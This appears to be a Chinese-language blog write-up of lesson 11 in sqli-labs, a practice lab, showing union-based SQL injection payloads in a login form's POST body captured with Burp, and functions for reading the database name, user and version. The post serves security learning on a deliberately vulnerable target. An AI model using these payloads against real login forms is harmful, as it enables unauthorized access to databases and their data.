加载中...

sqli-labs/11

sqli-labs/lesson-11

第11关

image-20220401205319031

打开第11关,index.php,添加echo $sql.

image-20220401205741313

利用burp抓包,并且此代码复制过来.

注意此处有单引号,所以注入时,也要有单引号.

uname=admi' order by 2 #&passwd=admin&submit=Submit

image-20220401210046811

image-20220401205535760

利用order by n,猜解有几个id

利用hackbar查询,order by 2,判断有几个id. 后面记得加#或者--+,这是注释符.

接下来进行联合查询.在字段1,2,处进行查询,

信息收集关键词有:

  1. user() root@localhost
  2. version() 5.5.53
  3. @@version_compile_os Win32
  4. database() security

image-20220401210827386

uname=admi' union select version(),@@version_compile_os #&passwd=admin&submit=Submit

image-20220401210212443

uname=admi' union select database(),user() #&passwd=admin&submit=Submit

利用burp的repeater模块也可以进行sql注入

image-20220401211133258

总结:@@version_compile_os 有两个@@符号不要忘,注释符不要忘

posted @ 2022-04-01 21:12  小马sky  阅读(80)  评论(0编辑  收藏  举报